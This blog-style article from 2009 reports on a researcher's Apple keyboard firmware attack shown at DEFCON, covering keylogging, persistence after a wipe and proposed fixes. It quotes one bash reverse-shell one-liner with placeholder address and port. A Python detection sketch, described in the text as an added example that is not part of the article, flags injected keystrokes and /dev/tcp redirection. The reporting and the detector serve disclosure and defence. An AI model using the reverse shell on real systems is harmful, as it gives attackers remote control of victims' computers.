
Apple keyboards hacked and possessed

1 August 2009

As if the news about all the new critical iPhone and Mac OS X vulnerabilities announced at BlackHat 2009 wasn’t bad enough, there now appears to be a new vulnerability in Apple’s hardware.  This type of hack, however, isn’t something you can take to an Apple store and have an Apple “genius” exorcise, because once the Apple keyboard is infected and locked, there is no practical way of undoing the damage.

I got a chance to interview the security researcher at DEFCON 2009 (another security conference immediately following BlackHat) who discovered this flaw.  The researcher explained that he goes by the name “K. Chen” because he feared harassment from staunch Apple fans who actually believe those Mac versus PC security commercials.  In the video below, I had Mr. Chen demonstrate his possessed keyboard on my computer which had no special software installed.  The keyboard would actually spit out in reverse order what had been typed into it whenever the ENTER key was pressed.  This showed that the keyboard was indeed modified with special firmware which can record what was typed and inject it back into the host computer.  This key logging capability can even work during the boot phase which would unlock additional hardware encryption features.

Once this keyboard is possessed by an attacker, the keyboard can easily fire up a bash connect back shell by launching a console and feeding in the following characters:

exec /bin/sh 0</dev/tcp/IP/PORT 1>&0 2>&0

This would instantly connect the computer to the attacker’s computer and give the attacker full control of it, at which point additional rootkits could be installed.  While this process would be visible to the human user while it’s happening, that risk would be minimized by waiting through an hour of keyboard inactivity, and a simple “Open Apple + M” keystroke would minimize the console shell, hiding its actions further.
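From the defender's side, the behaviour described above leaves three observable signals: a burst of keystrokes arriving faster than a person types, arriving after a long idle period, and containing a /dev/tcp redirection. The following sketch is an added example, not code from K. Chen or from this article; it assumes the host can log (timestamp, character) key events, and the thresholds and function names are illustrative assumptions.

```python
import re

# Thresholds are assumptions for illustration, not values from the article.
IDLE_GAP_S = 3600.0    # the "hour of keyboard inactivity" the firmware waits out
MAX_HUMAN_CPS = 15.0   # sustained characters/second beyond plausible human typing
MIN_BURST_LEN = 12     # ignore very short bursts when judging speed
# Bash network redirection, as used by the one-liner quoted in the article.
DEV_TCP = re.compile(r"[<>]\s*/dev/(tcp|udp)/\S+/\S+")

def split_bursts(events, pause_s=2.0):
    """Group (timestamp, char) events into (idle_before, burst) pairs."""
    bursts, current, idle_before, prev_t = [], [], None, None
    for t, ch in events:
        gap = None if prev_t is None else t - prev_t
        if current and gap > pause_s:
            bursts.append((idle_before, current))
            current = []
        if not current:
            idle_before = gap          # idle time that preceded this burst
        current.append((t, ch))
        prev_t = t
    if current:
        bursts.append((idle_before, current))
    return bursts

def analyze(events):
    """Return (start, text, reasons) for bursts showing at least two signals."""
    findings = []
    for idle_before, burst in split_bursts(events):
        text = "".join(ch for _, ch in burst)
        duration = burst[-1][0] - burst[0][0]
        rate = len(burst) / duration if duration > 0 else float("inf")
        reasons = []
        if len(burst) >= MIN_BURST_LEN and rate > MAX_HUMAN_CPS:
            reasons.append("machine-speed typing")
        if idle_before is not None and idle_before >= IDLE_GAP_S:
            reasons.append("follows long idle period")
        if DEV_TCP.search(text):
            reasons.append("/dev/tcp redirection")
        if len(reasons) >= 2:
            findings.append((burst[0][0], text, reasons))
    return findings

def typed(text, start, interval):
    """Build constructed key events: one character every `interval` seconds."""
    return [(start + i * interval, ch) for i, ch in enumerate(text)]

# Constructed sample: a person types a command, then after a long idle the
# article's one-liner (placeholders IP/PORT kept) arrives at machine speed.
SAMPLE = typed("ls -la\n", 0.0, 0.2) + typed(
    "exec /bin/sh 0</dev/tcp/IP/PORT 1>&0 2>&0\n", 4000.0, 0.005)
```

Requiring two signals keeps an administrator who slowly types a /dev/tcp command by hand from being flagged; firmware that paces its keystrokes would evade the speed check, so this is a heuristic and not a substitute for locked or signed firmware.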

What all this basically means is that this keyboard can betray any computer it attaches to by:

  • Recording your password keystrokes
  • Delivering your computer into the attacker’s hands
  • Re-infecting your computer even if its hard drive was completely wiped

To infect your keyboard, the attacker only needs to exploit one of the many weaknesses in Mac OS X and Apple applications.  Once exploited, the attacker only needs to drop less than 100 KB of payload to infect the keyboard and the attack takes less than 18 seconds.

This type of attack, which is resilient against a full hard drive wipe, is considered the holy grail of computer hacking because the hardware itself has been infected.  Once the Apple keyboard (USB or Bluetooth) is infected, it is extremely difficult to detect, and the only practical way to get rid of the infection is to throw away the keyboard.

Mr. Chen also explained that he had been working with Apple to come up with a solution, but that he feared Apple may be selecting the weaker fix by only blocking future revisions of Mac OS X from infecting the keyboard.  This would not prevent the keyboard from being hacked by another computer running something other than the latest version of Mac OS X, nor does it guarantee that a patched Mac OS X computer can’t bypass the proposed protections.  The cleaner solution Mr. Chen is proposing is that Apple should simply lock the keyboard firmware against any future modifications, since the keyboard doesn’t implement any digital signature protection.

I asked Mr. Chen why Apple would leave the firmware open and he explained that Apple had a tendency to rush hardware to market, which has resulted in shipped keyboards with flaws that needed firmware updates.  But because the keyboards are already more mature today, perhaps it wouldn’t be a bad idea for Apple to lock in the firmware.  I then asked Mr. Chen if he could produce a utility for consumers to lock their own keyboards and he said yes, but he would rather wait for Apple’s finalized solution first.  If the Apple solution is inadequate, then he might revisit the possibility of producing a keyboard firmware locking utility.  Until such time, buyers considering Apple keyboards have been warned.

K. Chen has released a 190-page deck of slides that details how all of this is done.  That and all the other BlackHat 2009 slides and papers can be found here.
